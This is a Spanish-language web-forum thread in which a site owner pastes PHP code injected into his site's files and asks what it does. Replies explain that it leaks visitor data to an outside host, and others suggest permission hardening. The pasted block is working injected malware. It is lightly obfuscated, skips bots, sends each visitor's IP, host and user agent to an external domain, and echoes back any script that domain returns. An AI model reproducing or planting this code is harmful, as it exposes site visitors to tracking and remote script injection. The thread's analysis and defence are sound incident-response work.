We are in the process of migrating this forum. A new space will be available soon. We are sorry for the inconvenience.

codigo


Ñuño Martínez
27/08/2015, 11:39
Estimado Chacho: La mejor forma es jugar con los permisos.

Cambia el propietario y el grupo de los mismos para que pertenezcan al usuario FTP, y luego cambia los permisos de escritura de los archivos, de forma que sólo el propietario pueda escribir. Luego ve a los directorios donde guarde las caches y los logs (si hay alguno) y cámbiale los permisos para que cualquiera pueda escribir en ellos.

Es tan fácil que siempre me pregunto por qué normalmente nadie lo hace.

alvaroag
16/08/2015, 08:50
Agregame a Skype(a.aguayo), y ahi te puedo echar una mano

Chacho
15/08/2015, 17:57
muchas gracias en todos los php el codigo es igual y no encuentro ningun base64 oculto y no sabras que opcion puedo activar prra evitar eso? tengo mod security con reglas, firewall, htaccess con algunos bloqueos y la configuracion de seguridad recomendada de cpanel aparte de seguir algun tutorial de aqui, pero no ha sido suficiente

alvaroag
15/08/2015, 17:44
Pues no hace gran cosa.... manda una solicitud HTTP GET a "http://webhttps.com/web", agregándole: dirección IP del usuario, host name al que visita, y la idenfiticación del navegador.

Aparentemente, a alguien en Rusia le interesa tener esa información

Chacho
15/08/2015, 16:46
hola, no se si esto va a qui si no es aqui por favor lo pueden mover a su sitio? gracias

el tema que me encontre que alguien habia metido codigo en los archivos php de mi web y queria saber que hace

este es el codigo

Código:
#5cdfb6#
error_reporting(0); @ini_set('display_errors',0); $wp_zbgnf82 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_zbgnf82) && !preg_match ('/bot/i', $wp_zbgnf82))){
$wp_zbgnf0982="http://"."web"."https".".com/"."web/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_zbgnf82);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_zbgnf0982); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_82zbgnf = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_82zbgnf = @file_get_contents($wp_zbgnf0982);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_82zbgnf=@stream_get_contents(@fopen($wp_zbgnf0982, "r"));}}
if (substr($wp_82zbgnf,1,3) === 'scr'){ echo $wp_82zbgnf; }
#/5cdfb6#
Alguien podria decirme que hace y si es muy peligroso? Alguna sugerencia de como parar eso en cpanel? con el hataccess quizas?

Edito que por estas cosas $wp_82zbgnf,1,3 parece qeu va por wordpress pero mi web no es wordpress es smf

gracias de antemano